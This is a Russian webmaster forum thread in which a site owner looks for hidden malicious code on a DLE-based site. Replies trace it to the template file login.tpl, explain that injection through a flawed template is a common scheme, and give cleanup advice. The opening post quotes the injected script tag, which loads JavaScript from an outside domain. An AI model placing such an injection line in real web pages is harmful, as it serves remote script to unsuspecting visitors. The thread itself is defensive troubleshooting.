Вредоносный код в DLE

12
WebMasterArtem
На сайте с 04.06.2010
Offline
28
1380

Уже довольно долго не могу найти этот код. Гугл говорит, что на сайте присутствует такой код:

<script language="JavaScript" charset="windows-1251" rel="no

follow" src="http://under-click.net/js/if.php?id=7563">

Но если посмотреть исходный код страницы - вышеуказанного кода нету...

Проверил все файлы шаблона, index.php, .htacess и другие

Проверил всю базу данных

Заказал сайт на ПК и проверил касперским 2011

НО НИЧЕГО НЕ НАШЁЛ :(

Может кто знает, где он может прятаться...

Блог-эксперимент Физика за год (http://fizikazagod.ru).
Phreak
На сайте с 29.11.2009
Offline
156
#1

покажите пациента

KMA.BIZ (/ru/forum/869394) - Хочешь денег? Раздаем Oblivochki.biz ( /ru/forum/879341) - Обливочки. Они ждут тебя. Облейся трафом
A
На сайте с 20.08.2010
Offline
775
#2

в main.tpl смотрели? недавно у себя оттуда код удалил. причем в админке пасс сменили, пришлось через бд менять

зы: странно, что в коде не видно

WebMasterArtem
На сайте с 04.06.2010
Offline
28
#3
Phreak:
покажите пациента

отписал в ЛС

Phreak
На сайте с 29.11.2009
Offline
156
#4

login.tpl, сделайте поиск по 'under-click.net' и удалите всё.

G
На сайте с 12.04.2008
Offline
101
#5

Стандартная схема. У Вас шаблон кривой через него и вставляют. login.tpl вызывает картинку, вместо которой php код - вот и все.

Продажа сайтов (/ru/forum/866932) под Amazon и AdSense
infant
На сайте с 15.03.2008
Offline
170
#6

Откройте файл templates/имя_шаблона/login.tpl

найдите строку <span>Пароль:</span> и все что после удалите. (иммено на этой строке удалять)

П.С. Если появилось недавно, значит появится снова. Латайте дыры.

WebMasterArtem
На сайте с 04.06.2010
Offline
28
#7
infant:
Откройте файл templates/имя_шаблона/login.tpl
найдите строку <span>Пароль:</span> и все что после удалите. (иммено на этой строке удалять)

П.С. Если появилось недавно, значит появится снова. Латайте дыры.

Спасибо больше! Как я только сам не нашёл, а как вы узнали?

A
На сайте с 20.08.2010
Offline
775
#8
WebMasterArtem:
Спасибо больше! Как я только сам не нашёл, а как вы узнали?

а я вам подскажу на будущее. правая мышь - исходный код страницы - ctrl+f - ищите нужный код (в данном случае можно было ввести адрес under-click). это так находится. а удаляется через main.tpl тоже через поиск. на dle можно через админку

WebMasterArtem
На сайте с 04.06.2010
Offline
28
#9
awasome:
а я вам подскажу на будущее. правая мышь - исходный код страницы - ctrl+f - ищите нужный код (в данном случае можно было ввести адрес under-click). это так находится. а удаляется через main.tpl тоже через поиск. на dle можно через админку

Я в курсе...

WebMasterArtem добавил 12.01.2011 в 21:44

Просто получилось так, что проверил все кроме login.tpl...

Trafikgon
На сайте с 24.10.2008
Offline
174
#10
GSMtricks:
Стандартная схема. У Вас шаблон кривой через него и вставляют. login.tpl вызывает картинку, вместо которой php код - вот и все.

Как - то защититься от этого можно? может отключить везде картинки к аватарам!

. (#)
12

Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий